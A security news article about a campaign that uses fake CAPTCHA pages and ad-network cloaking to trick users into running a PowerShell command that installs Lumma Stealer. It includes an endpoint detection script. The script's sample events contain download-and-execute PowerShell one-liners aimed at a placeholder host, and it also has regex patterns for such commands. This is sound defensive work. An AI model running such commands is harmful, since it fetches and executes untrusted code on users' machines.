Fake CAPTCHA pages used to propagate information-stealing malware.
Two legitimate services are being misused for the distribution of infostealers.
Security researchers have detected a malicious campaign distributing the Lumma Stealer malware by means of fake CAPTCHA pages. These pages display a bogus verification prompt that asks visitors to "solve" the CAPTCHA by copying harmful code to the clipboard and then executing a command in CMD.
This discovery, made by Guardio Labs, reveals an operation known as “DeceptionAds,” which targets millions of individuals. The campaign relies on two legitimate services: the ad network Monetag and the cloud-based performance tracking platform BeMob. It starts with fraudulent ads that echo the preferences of the audience on the host websites, including misleading offers, downloads, or related services, with an emphasis on pirated streaming platforms and software.
When clicking on the ad, the victim is redirected to a fake CAPTCHA page via BeMob's cloaking service. This approach complicates moderation since BeMob is a legitimate service that is not blocked by default from Monetag's network. According to Nati Tal, director of Guardio Labs, “the attackers used a harmless BeMob URL instead of the fake CAPTCHA page, leveraging BeMob's reputation and making Monetag's content moderation efforts more difficult.”
The CAPTCHA page includes JavaScript that copies a malicious PowerShell command to the clipboard. The victim is then instructed to paste that command into CMD and run it as the "solution" to the CAPTCHA. Doing so executes the command, which downloads and runs Lumma Stealer, an infostealer widely traded in the cybercriminal underground.
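Because the page itself is attacker-controlled, the defensive observation point for this technique is the endpoint: the pasted command shows up as PowerShell launched from a user shell (CMD or the Explorer Run dialog) with download-and-execute arguments. The following is an added detection example written for this article, not code from Guardio Labs or from the campaign; the field names loosely follow Sysmon Event ID 1 (process creation) and are assumptions to adapt to your EDR schema, and the sample events and the `placeholder.invalid` URL are constructed.

```python
import re

# Assumed field names modelled on Sysmon Event ID 1; adjust for your telemetry.
USER_SHELL_PARENTS = {"explorer.exe", "cmd.exe"}   # where a pasted command starts
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# (label, regex) pairs matched against the child's command line. Several of
# these are individually benign; the combination is what characterises a
# paste-into-CMD "CAPTCHA solution".
INDICATORS = [
    ("hidden-window",   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded-command", re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("policy-bypass",   re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I)),
    ("web-download",    re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                   r"downloadstring|downloadfile|net\.webclient)\b", re.I)),
    ("in-memory-exec",  re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("url",             re.compile(r"https?://", re.I)),
]

# Constructed sample events (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",          # user pasted into CMD
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://placeholder.invalid/stage | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",              # benign admin script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\services.exe",     # not a user shell: out of scope here
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "iwr http://placeholder.invalid/update | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",              # Run dialog, one weak indicator only
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ec aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Q="},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indicators_for(event: dict) -> list:
    """Labels of every indicator matched by one process-creation event.

    Returns [] when the parent/child pair does not match the paste-into-shell
    shape, so callers can treat an empty list as 'not applicable'.
    """
    if basename(event.get("ParentImage", "")) not in USER_SHELL_PARENTS:
        return []
    if basename(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return []
    command_line = event.get("CommandLine", "")
    return [label for label, rx in INDICATORS if rx.search(command_line)]


def triage(events: list, threshold: int = 2) -> list:
    """Return (index, matched_labels) for events reaching the indicator threshold."""
    alerts = []
    for i, event in enumerate(events):
        hits = indicators_for(event)
        if len(hits) >= threshold:
            alerts.append((i, hits))
    return alerts


if __name__ == "__main__":
    for index, labels in triage(SAMPLE_EVENTS):
        print(f"ALERT event {index}: {', '.join(labels)}")
```

The threshold of two keeps single weak signals (an encoded command on its own, a URL on its own) from paging anyone, while the pasted download-and-execute one-liner described above trips most of the list at once. The parent-process filter is deliberate: PowerShell started by a service or scheduled task deserves its own rule, not this one.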
This malware is capable of stealing a variety of sensitive information, ranging from cryptocurrency wallets and browser data to email credentials, financial information, FTP client data, and system details. Upon being informed about the campaign, both Monetag and BeMob took action. Monetag removed 200 accounts, while BeMob concluded the campaign within four days.